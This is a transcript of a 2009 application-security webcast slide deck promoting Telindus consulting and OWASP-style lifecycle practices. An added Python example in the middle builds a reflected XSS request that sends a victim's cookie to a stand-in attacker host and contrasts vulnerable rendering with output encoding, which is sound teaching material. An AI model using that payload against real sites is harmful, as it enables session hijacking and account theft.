Application Security Services: A pro-active approach (PowerPoint presentation transcript)
1
Application Security Services: A pro-active approach
  • Webcast

Sebastien Deleersnyder
16 November 2009
2
Who Am I?
  • 5 years developer experience
  • 8 years information security experience
  • Lead application security at Telindus, Belgacom
    ICT
  • Belgian OWASP chapter founder
  • OWASP board member
  • www.owasp.org

3
Web application (in)security
4
Hacktivism
5
Hacking for Dollar
  • Online Extortion
  • Identity theft
  • Steal credit cards
  • Bot-net pharming
  • Sell phishing tools

Source: www.shadowserver.org, Sep 08
6
XSS in 7 major Dutch online banks (?o?ald)
  • Postbank
  • ABN AMRO
  • SNS bank
  • Fortis banking
  • Delta Lloyd banking
  • Spaarbeleg banking
  • Insinger de Beaufort banking

Source: 0x000000.com
7
Problem illustration
Your security perimeter has huge holes at the
application layer.

(Diagram, top to bottom, with an application attack
passing straight through every layer to the custom code:)
Application layer: custom developed application code,
backed by databases, legacy systems, web services,
directories, human resources and billing systems
App server
Web server
Hardened OS
Network layer: firewall

Firewall, SSL, IDS and hardening do not stop or
detect application layer attacks.
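The slide's point is that an application-layer attack is, to every device below the application, a perfectly legal request. The following added example (not from the presentation) makes that concrete with the reflected XSS class referenced on the banking slide: a constructed request line carrying a script payload, a check that mimics what a port-based firewall can decide on, the vulnerable reflection, and the hardened version using output encoding. The /greet endpoint, the name parameter and the evil.example host are assumptions made for the example.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed sample request (not from the presentation): a reflected-XSS probe
# against a hypothetical /greet endpoint. At the network layer this is just a
# well-formed HTTP request to the web server's port; over SSL/TLS a firewall or
# IDS does not even see the path.
SAMPLE_REQUEST_LINE = (
    "GET /greet?name=%3Cscript%3Edocument.location%3D%27http%3A//evil.example/%3F%27"
    "%2Bdocument.cookie%3C/script%3E HTTP/1.1"
)


def passes_network_layer(request_line):
    """Mimics what a packet filter or generic IDS can decide on: the request is
    syntactically legal HTTP to an allowed service. It says nothing about the payload."""
    method, target, version = request_line.split(" ")
    return method in {"GET", "POST"} and target.startswith("/") and version.startswith("HTTP/1.")


def query_param(request_line, key):
    """Extracts and URL-decodes a query parameter, as the application framework would."""
    _method, target, _version = request_line.split(" ")
    return parse_qs(urlsplit(target).query, keep_blank_values=True).get(key, [""])[0]


def render_vulnerable(name):
    """Reflects the parameter straight into the page: the reflected XSS pattern."""
    return f"<p>Hello, {name}!</p>"


def render_hardened(name):
    """Same page with output encoding for the HTML text context, so the browser
    treats the input as text rather than markup."""
    return f"<p>Hello, {html.escape(name, quote=True)}!</p>"


if __name__ == "__main__":
    name = query_param(SAMPLE_REQUEST_LINE, "name")
    print("legal at network layer:", passes_network_layer(SAMPLE_REQUEST_LINE))
    print("vulnerable:", render_vulnerable(name))
    print("hardened:  ", render_hardened(name))
```

Note that html.escape is the right encoding only for an HTML text or quoted-attribute context; a value placed inside a script block, a URL or a CSS property needs the encoding for that context, which is exactly the kind of defect a source code review looks for.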
8
Making it harder
complexity
spaghetti code
9
Making it even harder
no application security awareness / training
need for bells and whistles
10
Application Security
  • Combination of services and technology to
    protect critical business applications from
    external threats.

(Diagram: application value plotted against risk)
11
Pro-active action!
  • 360° approach for secure applications: end-to-end
    protection

(Diagram: activities placed along the lifecycle
plan, build, test, field)
  • architectural risk analysis
  • security code review
  • security testing
  • WAF/XML firewalls
  • policy, awareness, training
12
People
13
Architectural Risk Analysis
14
Source Code Security Review
15
Application Security Testing
16
Web Application / XML Firewall
17
Pro-active Application Security
(Diagram: 360° Protection cycle)
Streamline
  • Embed good practices
  • Tune metrics
  • Report
Analyse
  • Application security maturity
  • Risk profile
  • Set objectives
Implement
  • Application security controls
  • Quick wins
  • 80/20
Assess
  • Process metrics
  • Application defects
  • People feedback

18
References
  • Organisations whose business processes depend
    increasingly on applications.
  • Examples
  • Finance (online banking, online insurance
    brokers)
  • Government (e-government, e-forms)
  • Industry (retail, b2b chains, online shops)

19
Telindus Services
  • Telindus experts provide application security
    services
  • 360° Consultancy
  • Source code review
  • Security Testing
  • Telindus delivers 360° solutions with technology
    partners
  • Web application firewalls
  • XML integration/security gateways
  • Security scanning tools (source code /
    production)

20
Stay ahead